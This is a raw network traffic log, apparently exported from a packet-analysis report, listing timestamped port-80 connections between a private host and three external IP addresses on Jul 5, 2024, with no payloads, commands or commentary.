                                                                Jul 5, 2024 04:23:19.110774040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110783100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110795021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110806942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110810041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110817909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110829115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110831976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110841036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110852003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110852957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110862017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110862017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110876083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110888958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110898018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110908985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110917091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110922098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110933065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110943079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110954046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110960007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110965014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110975981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110985994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.110987902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.110996962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111001015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111006975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111040115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111042023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111052990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111088991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111103058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111115932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111124992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111135006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111144066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111146927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111156940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111161947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111185074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111206055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111330986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111341953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111347914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111351967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111361980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111371994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111382008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111382961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111394882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111402035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111406088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111416101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111418009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.111440897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.111464024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190206051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190272093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190283060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190336943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190360069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190373898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190386057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190396070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190409899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190418959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190429926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190442085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190448999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190464020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190468073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190471888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190485001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190485954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190498114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190509081 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190509081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190521002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190522909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190540075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190570116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190624952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190634966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190675974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190717936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190728903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190740108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190749884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190762997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190774918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190798998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190843105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190853119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190861940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190872908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190884113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190890074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190896034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.190917015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.190931082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191023111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191035032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191044092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191054106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191061974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191073895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191082954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191083908 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191093922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191102028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191106081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191117048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191119909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191128969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191138983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191144943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191165924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191176891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191199064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191211939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191222906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191247940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191255093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191265106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191274881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191281080 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191293955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191307068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.191312075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.191343069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.224390984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.230834007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.340778112 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:19.340864897 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.341430902 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.346229076 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:19.404633999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404656887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404668093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404678106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404689074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404690981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404707909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404714108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404728889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404737949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404745102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404748917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404762030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404767990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404773951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404797077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404814005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404824018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404824972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404836893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404848099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404853106 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404860020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404867887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404903889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404923916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404933929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404944897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404956102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404956102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.404968977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404979944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.404989004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405011892 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405042887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405052900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405062914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405076981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405086040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405086994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405108929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405127048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405145884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405157089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405167103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405178070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405190945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405205965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405226946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405250072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405311108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405314922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405327082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405335903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405347109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405353069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405358076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405369997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405380011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405380011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405392885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405396938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405421972 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405445099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405472040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405482054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405493021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405503988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405514002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405517101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405528069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405539036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405539989 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405554056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405555010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405575037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405600071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405637980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405648947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405658960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405670881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405680895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405683041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405693054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405704975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405708075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405716896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405745983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405778885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405790091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405807972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405819893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405823946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405831099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405842066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405843973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405853987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405872107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405894995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.405981064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.405992031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406003952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406014919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406024933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406032085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.406035900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406052113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.406052113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406076908 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.406085968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.406114101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406124115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406135082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406143904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.406162977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.406182051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.563677073 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:19.565376997 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.678886890 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.679857016 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.684071064 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:19.684117079 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.684672117 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:19.684983969 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.685477018 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:19.690278053 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:19.841190100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.841211081 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:19.852705002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:19.852714062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:20.385387897 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:20.385464907 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.386132956 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.390887022 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:20.610861063 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:20.611084938 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.614025116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:20.614078999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:20.659255028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:20.664021015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:20.723172903 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.723434925 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.728315115 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:20.729651928 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.729727983 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.730007887 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:20.730185032 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:20.743501902 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:20.845496893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:20.845511913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:20.845520020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:20.845568895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:20.845597982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:20.847337961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:20.858875036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:21.047276974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:21.047430038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:21.063704014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:21.068655968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:21.445360899 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:21.447309971 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.447952032 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.452707052 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:21.633249044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:21.633321047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:21.656035900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:21.660797119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:21.671865940 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:21.671919107 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.785727024 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.786006927 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.794473886 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:21.794543982 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.794718981 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.795212984 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:21.795260906 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:21.799540997 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:22.340344906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:22.340404987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:22.343111038 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:22.347924948 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:22.347999096 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:22.348119974 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:22.352905035 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:22.506867886 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:22.506930113 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.509042025 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.513801098 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:22.729518890 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:22.729572058 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.832535982 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.832818031 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.842931986 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:22.843002081 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.843081951 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:22.843116045 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.843280077 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:22.847893000 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:23.057163000 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:23.057177067 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:23.057188034 CEST804975377.91.77.81192.168.2.4
